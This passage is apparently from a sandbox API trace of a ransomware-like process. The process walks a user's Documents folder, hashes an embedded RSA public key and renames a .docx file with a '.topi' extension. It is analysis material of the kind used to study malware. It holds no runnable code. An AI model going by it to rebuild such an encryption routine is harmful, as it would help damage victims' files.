(lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.864] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x9179, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.865] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.866] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.866] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.866] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.866] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x919f, lpOverlapped=0x0) returned 1 [0094.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.866] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.866] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.866] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.868] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.868] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.868] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.868] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.869] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.869] GetLastError () returned 0x0 [0094.869] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.869] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.869] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.869] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.869] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.869] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.869] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.869] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.869] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.869] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x91a0) returned 0x99f72d8 [0094.869] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.869] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.870] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.870] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.870] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.870] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.870] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DRI_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7dri_.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DRI_.docx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7dri_.docx.topi")) returned 1 [0094.871] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.871] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.872] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.873] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0094.873] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c5fb70, ftCreationTime.dwHighDateTime=0x1d5b925, ftLastAccessTime.dwLowDateTime=0x799ac810, ftLastAccessTime.dwHighDateTime=0x1d5bb12, ftLastWriteTime.dwLowDateTime=0x799ac810, ftLastWriteTime.dwHighDateTime=0x1d5bb12, nFileSizeHigh=0x0, nFileSizeLow=0x8e2b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8_akOq5K7U9Vl.doc", cAlternateFileName="8_AKOQ~1.DOC")) returned 1 [0094.873] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8_akOq5K7U9Vl.doc") returned=".doc" [0094.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8_akOq5K7U9Vl.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8_akoq5k7u9vl.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.874] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=36395) returned 1 [0094.874] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.877] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8e05, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.877] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.878] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.880] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.880] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.880] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.880] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.880] GetLastError () returned 0x0 [0094.880] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.880] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.880] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.880] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.880] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.880] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.880] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.880] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.880] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.880] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e30) returned 0x99f72d8 [0094.880] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d4030 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91f8 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d4078 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9210 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9240 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9258 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.881] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9240 | out: hHeap=0x680000) returned 1 [0094.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9258 | out: hHeap=0x680000) returned 1 [0094.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0094.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9258 [0094.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9240 [0094.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0094.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9258 | out: hHeap=0x680000) returned 1 [0094.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9240 | out: hHeap=0x680000) returned 1 [0094.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.882] GetCurrentThreadId () returned 0x8c4 [0094.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5380 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.883] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.883] GetCurrentThreadId () returned 0x8c4 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.883] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.883] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.883] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.883] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.883] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.884] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9240 [0094.884] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.884] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9258 [0094.884] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.884] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9228 [0094.884] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.884] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9270 [0094.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0094.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9240 | out: hHeap=0x680000) returned 1 [0094.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9240 [0094.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9240 | out: hHeap=0x680000) returned 1 [0094.886] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.886] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9270 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9258 | out: hHeap=0x680000) returned 1 [0094.886] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9228 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9210 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4078 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0094.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.887] 